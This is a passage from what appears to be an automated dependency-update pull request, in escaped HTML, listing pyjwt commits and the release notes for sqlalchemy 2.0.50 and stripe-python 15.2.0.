href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sqlalchemy` from 2.0.49 to 2.0.50\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/releases\"\u003esqlalchemy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.0.50\u003c/h1\u003e\n\u003cp\u003eReleased: May 24, 2026\u003c/p\u003e\n\u003ch2\u003eorm\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.joinedload()\u003c/code\u003e with\n\u003ccode\u003ePropComparator.of_type()\u003c/code\u003e targeting a joined-table subclass combined\nwith \u003ccode\u003ePropComparator.and_()\u003c/code\u003e referencing a column on that subclass\nwould generate invalid SQL, where the subclass column was not adapted to\nthe subquery alias.  Pull request courtesy Joaquin Hui Gomez.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13203\"\u003e#13203\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where the presence of a \u003ccode\u003eSessionEvents.do_orm_execute()\u003c/code\u003e\nevent hook would cause internal execution options such as \u003ccode\u003eyield_per\u003c/code\u003e and\nloader-specific state from the first \u003ccode\u003eorm_pre_session_exec\u003c/code\u003e pass to leak\ninto the second pass, leading to errors when using relationship loaders\nsuch as \u003ccode\u003eselectinload()\u003c/code\u003e and \u003ccode\u003eimmediateload()\u003c/code\u003e.  The execution\noptions passed to the second compilation pass are now based on the original\noptions plus only the explicit updates made via\n\u003ccode\u003eORMExecuteState.update_execution_options()\u003c/code\u003e within the event hook.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13301\"\u003e#13301\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.with_polymorphic()\u003c/code\u003e on a leaf class (a\nsubclass with no further descendants) or a non-inherited class would fail\nwith an \u003ccode\u003eAttributeError\u003c/code\u003e when used in an ORM statement, due to\n\u003ccode\u003e_orm.configure_mappers()\u003c/code\u003e not being triggered implicitly. The fix\nensures that \u003ccode\u003eAliasedInsp\u003c/code\u003e participates in the \u003ccode\u003e_post_inspect\u003c/code\u003e\nhook, triggering mapper configuration during ORM statement compilation.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13319\"\u003e#13319\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esql\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[sql] [bug]\u003c/strong\u003e Fixed issue where floor division (\u003ccode\u003e//\u003c/code\u003e) between a \u003ccode\u003eFloat\u003c/code\u003e or\n\u003ccode\u003eNumeric\u003c/code\u003e numerator and an \u003ccode\u003eInteger\u003c/code\u003e denominator would omit\nthe \u003ccode\u003eFLOOR()\u003c/code\u003e SQL wrapper on dialects where\n\u003ccode\u003eDialect.div_is_floordiv\u003c/code\u003e is \u003ccode\u003eTrue\u003c/code\u003e (the default, including\nPostgreSQL and SQLite).  \u003ccode\u003eFLOOR()\u003c/code\u003e is now applied if either the\ndenominator or the numerator is a non-integer, so that expressions such as\n\u003ccode\u003efloat_col // int_col\u003c/code\u003e render as \u003ccode\u003eFLOOR(float_col / int_col)\u003c/code\u003e instead\nof the incorrect \u003ccode\u003efloat_col / int_col\u003c/code\u003e.  Pull request courtesy r266-tech.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/10528\"\u003e#10528\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003epostgresql\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `stripe` from 15.1.0 to 15.2.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/stripe/stripe-python/releases\"\u003estripe's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev15.2.0\u003c/h2\u003e\n\u003cp\u003eThis release changes the pinned API version to 2026-05-27.dahlia.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/stripe/stripe-python/pull/1816\"\u003e#1816\u003c/a\u003e Update generated code\n\u003cul\u003e\n\u003cli\u003eAdd support for new resource \u003ccode\u003ev2.commerce.ProductCatalogImport\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ecreate\u003c/code\u003e and \u003ccode\u003eretrieve\u003c/code\u003e methods on resource \u003ccode\u003ev2.commerce.ProductCatalogImport\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebizum_payments\u003c/code\u003e and \u003ccode\u003escalapay_payments\u003c/code\u003e on \u003ccode\u003eAccount.Capability\u003c/code\u003e, \u003ccode\u003eAccountCreateParamsCapability\u003c/code\u003e, and \u003ccode\u003eAccountModifyParamsCapability\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eautomatic_transfer_rules_by_currency\u003c/code\u003e on \u003ccode\u003eBalanceSettings.Payment.Payout\u003c/code\u003e and \u003ccode\u003eBalanceSettingsModifyParamsPaymentPayout\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003estart_of_day\u003c/code\u003e on \u003ccode\u003eBalanceSettings.Payment.SettlementTiming\u003c/code\u003e and \u003ccode\u003eBalanceSettingsModifyParamsPaymentSettlementTiming\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003edescription\u003c/code\u003e on \u003ccode\u003eChargeCreateParamsTransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntent.TransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsTransferDatum\u003c/code\u003e, and \u003ccode\u003ePaymentIntentModifyParamsTransferDatum\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebizum\u003c/code\u003e on \u003ccode\u003eCharge.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eConfirmationToken.PaymentMethodPreview\u003c/code\u003e, \u003ccode\u003eConfirmationTokenCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentAttemptRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003ePaymentIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationModifyParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfiguration\u003c/code\u003e, \u003ccode\u003ePaymentMethodCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethod\u003c/code\u003e, \u003ccode\u003ePaymentRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eSetupIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, and \u003ccode\u003eSetupIntentModifyParamsPaymentMethodOption\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003escalapay\u003c/code\u003e on \u003ccode\u003eCharge.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eCheckout.Session.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003eConfirmationToken.PaymentMethodPreview\u003c/code\u003e, \u003ccode\u003eConfirmationTokenCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentAttemptRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003ePaymentIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationModifyParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfiguration\u003c/code\u003e, \u003ccode\u003ePaymentMethodCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethod\u003c/code\u003e, \u003ccode\u003ePaymentRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eRefund.DestinationDetail\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003eSetupIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, and \u003ccode\u003echeckout.SessionCreateParamsPaymentMethodOption\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003emandate\u003c/code\u003e on \u003ccode\u003eCharge.PaymentMethodDetail.Twint\u003c/code\u003e, \u003ccode\u003ePaymentAttemptRecord.PaymentMethodDetail.Twint\u003c/code\u003e, and \u003ccode\u003ePaymentRecord.PaymentMethodDetail.Twint\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enums \u003ccode\u003ePaymentIntentConfirmParams.excluded_payment_method_types\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParams.excluded_payment_method_types\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParams.excluded_payment_method_types\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParams.excluded_payment_method_types\u003c/code\u003e, \u003ccode\u003eSetupIntentModifyParams.excluded_payment_method_types\u003c/code\u003e, and \u003ccode\u003echeckout.SessionCreateParams.excluded_payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eChange type of \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodOptionTwint.setup_future_usage\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodOptionTwint.setup_future_usage\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodOptionTwint.setup_future_usage\u003c/code\u003e, and \u003ccode\u003echeckout.SessionCreateParamsPaymentMethodOptionTwint.setup_future_usage\u003c/code\u003e from \u003ccode\u003eliteral('none')\u003c/code\u003e to \u003ccode\u003eenum('none'|'off_session')\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enum \u003ccode\u003echeckout.SessionCreateParams.payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Change type of \u003ccode\u003eCheckout.Session.PaymentMethodOption.Twint.setup_future_usage\u003c/code\u003e and \u003ccode\u003ePaymentIntent.PaymentMethodOption.Twint.setup_future_usage\u003c/code\u003e from \u003ccode\u003eliteral('none')\u003c/code\u003e to \u003ccode\u003eenum('none'|'off_session')\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enums \u003ccode\u003eConfirmationTokenCreateParamsPaymentMethodDatum.type\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodDatum.type\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodDatum.type\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodDatum.type\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodDatum.type\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParamsPaymentMethodDatum.type\u003c/code\u003e, and \u003ccode\u003eSetupIntentModifyParamsPaymentMethodDatum.type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enums \u003ccode\u003eConfirmationToken.PaymentMethodPreview.type\u003c/code\u003e and \u003ccode\u003ePaymentMethod.type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enums \u003ccode\u003eCustomerListPaymentMethodsParams.type\u003c/code\u003e, \u003ccode\u003ePaymentMethodCreateParams.type\u003c/code\u003e, and \u003ccode\u003ePaymentMethodListParams.type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ecredited_items\u003c/code\u003e on \u003ccode\u003eInvoiceItem.ProrationDetail\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new value \u003ccode\u003etwint\u003c/code\u003e on enums \u003ccode\u003eInvoiceCreateParamsPaymentSetting.payment_method_types\u003c/code\u003e, \u003ccode\u003eInvoiceModifyParamsPaymentSetting.payment_method_types\u003c/code\u003e, \u003ccode\u003eSubscriptionCreateParamsPaymentSetting.payment_method_types\u003c/code\u003e, and \u003ccode\u003eSubscriptionModifyParamsPaymentSetting.payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ediscountable\u003c/code\u003e on \u003ccode\u003eInvoiceCreatePreviewParamsScheduleDetailPhaseAddInvoiceItem\u003c/code\u003e, \u003ccode\u003eSubscriptionCreateParamsAddInvoiceItem\u003c/code\u003e, \u003ccode\u003eSubscriptionModifyParamsAddInvoiceItem\u003c/code\u003e, \u003ccode\u003eSubscriptionSchedule.Phase.AddInvoiceItem\u003c/code\u003e, \u003ccode\u003eSubscriptionScheduleCreateParamsPhaseAddInvoiceItem\u003c/code\u003e, and \u003ccode\u003eSubscriptionScheduleModifyParamsPhaseAddInvoiceItem\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebilling_schedules\u003c/code\u003e on \u003ccode\u003eInvoiceCreatePreviewParamsSubscriptionDetail\u003c/code\u003e, \u003ccode\u003eSubscriptionCreateParams\u003c/code\u003e, \u003ccode\u003eSubscriptionModifyParams\u003c/code\u003e, and \u003ccode\u003eSubscription\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new value \u003ccode\u003emax_billed_until\u003c/code\u003e on enums \u003ccode\u003eInvoiceCreatePreviewParamsSubscriptionDetail.cancel_at\u003c/code\u003e, \u003ccode\u003eSubscriptionCreateParams.cancel_at\u003c/code\u003e, and \u003ccode\u003eSubscriptionModifyParams.cancel_at\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eamount_paid_off_stripe\u003c/code\u003e on \u003ccode\u003eInvoice\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new value \u003ccode\u003etwint\u003c/code\u003e on enums \u003ccode\u003eInvoice.PaymentSetting.payment_method_types\u003c/code\u003e and \u003ccode\u003eSubscription.PaymentSetting.payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003etwint\u003c/code\u003e on \u003ccode\u003eMandate.PaymentMethodDetail\u003c/code\u003e and \u003ccode\u003eSetupAttempt.PaymentMethodDetail\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003emetadata\u003c/code\u003e on \u003ccode\u003ePaymentIntent.TransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsTransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsTransferDatum\u003c/code\u003e, and \u003ccode\u003eSubscription.PendingUpdate\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003epayment_data\u003c/code\u003e on \u003ccode\u003ePaymentIntent.TransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsTransferDatum\u003c/code\u003e, and \u003ccode\u003ePaymentIntentModifyParamsTransferDatum\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new values \u003ccode\u003ebizum\u003c/code\u003e and \u003ccode\u003escalapay\u003c/code\u003e on enums \u003ccode\u003ePaymentIntent.excluded_payment_method_types\u003c/code\u003e and \u003ccode\u003eSetupIntent.excluded_payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eblik_authorize\u003c/code\u003e on \u003ccode\u003ePaymentIntent.NextAction\u003c/code\u003e and \u003ccode\u003eSetupIntent.NextAction\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003epayment_method_options\u003c/code\u003e on \u003ccode\u003ePaymentLinkCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentLinkModifyParams\u003c/code\u003e, and \u003ccode\u003ePaymentLink\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new value \u003ccode\u003ebizum\u003c/code\u003e on enums \u003ccode\u003ePaymentLinkCreateParams.payment_method_types\u003c/code\u003e and \u003ccode\u003ePaymentLinkModifyParams.payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new value \u003ccode\u003ebizum\u003c/code\u003e on enum \u003ccode\u003ePaymentLink.payment_method_types\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eactive\u003c/code\u003e on \u003ccode\u003ePaymentMethodConfigurationListParams\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebilled_until\u003c/code\u003e on \u003ccode\u003eSubscriptionItem\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ediscount\u003c/code\u003e and \u003ccode\u003ediscounts\u003c/code\u003e on \u003ccode\u003eSubscription.PendingUpdate\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003everifone_m425\u003c/code\u003e, \u003ccode\u003everifone_p630\u003c/code\u003e, \u003ccode\u003everifone_ux700\u003c/code\u003e, and \u003ccode\u003everifone_v660p\u003c/code\u003e on \u003ccode\u003eTerminal.Configuration\u003c/code\u003e, \u003ccode\u003eterminal.ConfigurationCreateParams\u003c/code\u003e, and \u003ccode\u003eterminal.ConfigurationModifyParams\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new values \u003ccode\u003esimulated_verifone_m425\u003c/code\u003e, \u003ccode\u003esimulated_verifone_p630\u003c/code\u003e, \u003ccode\u003esimulated_verifone_ux700\u003c/code\u003e, \u003ccode\u003esimulated_verifone_v660p\u003c/code\u003e, \u003ccode\u003everifone_m425\u003c/code\u003e, \u003ccode\u003everifone_p630\u003c/code\u003e, \u003ccode\u003everifone_ux700\u003c/code\u003e, and \u003ccode\u003everifone_v660p\u003c/code\u003e on enum \u003ccode\u003eterminal.ReaderListParams.device_type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eapi_error\u003c/code\u003e and \u003ccode\u003eprint_content\u003c/code\u003e on \u003ccode\u003eTerminal.Reader.Action\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new value \u003ccode\u003eprint_content\u003c/code\u003e on enum \u003ccode\u003eTerminal.Reader.Action.type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new values \u003ccode\u003esimulated_verifone_m425\u003c/code\u003e, \u003ccode\u003esimulated_verifone_p630\u003c/code\u003e, \u003ccode\u003esimulated_verifone_ux700\u003c/code\u003e, \u003ccode\u003esimulated_verifone_v660p\u003c/code\u003e, \u003ccode\u003everifone_m425\u003c/code\u003e, \u003ccode\u003everifone_p630\u003c/code\u003e, \u003ccode\u003everifone_ux700\u003c/code\u003e, and \u003ccode\u003everifone_v660p\u003c/code\u003e on enum \u003ccode\u003eTerminal.Reader.device_type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ecustomer\u003c/code\u003e on \u003ccode\u003etest_helpers.TestClockCreateParams\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new value \u003ccode\u003e2026-05-27.dahlia\u003c/code\u003e on enum \u003ccode\u003eWebhookEndpointCreateParams.api_version\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003esigner\u003c/code\u003e on \u003ccode\u003eV2.Core.Account.Identity.BusinessDetail.Document.ProofOfRegistration\u003c/code\u003e, \u003ccode\u003eV2.Core.Account.Identity.BusinessDetail.Document.ProofOfUltimateBeneficialOwnership\u003c/code\u003e, \u003ccode\u003ev2.core.AccountCreateParamsIdentityBusinessDetailDocumentProofOfRegistration\u003c/code\u003e, \u003ccode\u003ev2.core.AccountCreateParamsIdentityBusinessDetailDocumentProofOfUltimateBeneficialOwnership\u003c/code\u003e, \u003ccode\u003ev2.core.AccountModifyParamsIdentityBusinessDetailDocumentProofOfRegistration\u003c/code\u003e, \u003ccode\u003ev2.core.AccountModifyParamsIdentityBusinessDetailDocumentProofOfUltimateBeneficialOwnership\u003c/code\u003e, \u003ccode\u003ev2.core.AccountTokenCreateParamsIdentityBusinessDetailDocumentProofOfRegistration\u003c/code\u003e, and \u003ccode\u003ev2.core.AccountTokenCreateParamsIdentityBusinessDetailDocumentProofOfUltimateBeneficialOwnership\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eazure_event_grid\u003c/code\u003e on \u003ccode\u003eV2.Core.EventDestination\u003c/code\u003e and \u003ccode\u003ev2.core.EventDestinationCreateParams\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new value \u003ccode\u003eno_azure_partner_topic_exists\u003c/code\u003e on enum \u003ccode\u003eV2.Core.EventDestination.StatusDetail.Disabled.reason\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e⚠️ Add support for new value \u003ccode\u003eazure_event_grid\u003c/code\u003e on enum \u003ccode\u003eV2.Core.EventDestination.type\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for new value \u003ccode\u003eazure_event_grid\u003c/code\u003e on enum \u003ccode\u003ev2.core.EventDestinationCreateParams.type\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/stripe/stripe-python/blob/master/CHANGELOG.md\"\u003estripe's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e15.2.0 - 2026-05-27\u003c/h2\u003e\n\u003cp\u003eThis release changes the pinned API version to 2026-05-27.dahlia.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/stripe/stripe-python/pull/1816\"\u003e#1816\u003c/a\u003e Update generated code\n\u003cul\u003e\n\u003cli\u003eAdd support for new resource \u003ccode\u003ev2.commerce.ProductCatalogImport\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ecreate\u003c/code\u003e and \u003ccode\u003eretrieve\u003c/code\u003e methods on resource \u003ccode\u003ev2.commerce.ProductCatalogImport\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebizum_payments\u003c/code\u003e and \u003ccode\u003escalapay_payments\u003c/code\u003e on \u003ccode\u003eAccount.Capability\u003c/code\u003e, \u003ccode\u003eAccountCreateParamsCapability\u003c/code\u003e, and \u003ccode\u003eAccountModifyParamsCapability\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eautomatic_transfer_rules_by_currency\u003c/code\u003e on \u003ccode\u003eBalanceSettings.Payment.Payout\u003c/code\u003e and \u003ccode\u003eBalanceSettingsModifyParamsPaymentPayout\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003estart_of_day\u003c/code\u003e on \u003ccode\u003eBalanceSettings.Payment.SettlementTiming\u003c/code\u003e and \u003ccode\u003eBalanceSettingsModifyParamsPaymentSettlementTiming\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003edescription\u003c/code\u003e on \u003ccode\u003eChargeCreateParamsTransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntent.TransferDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsTransferDatum\u003c/code\u003e, and 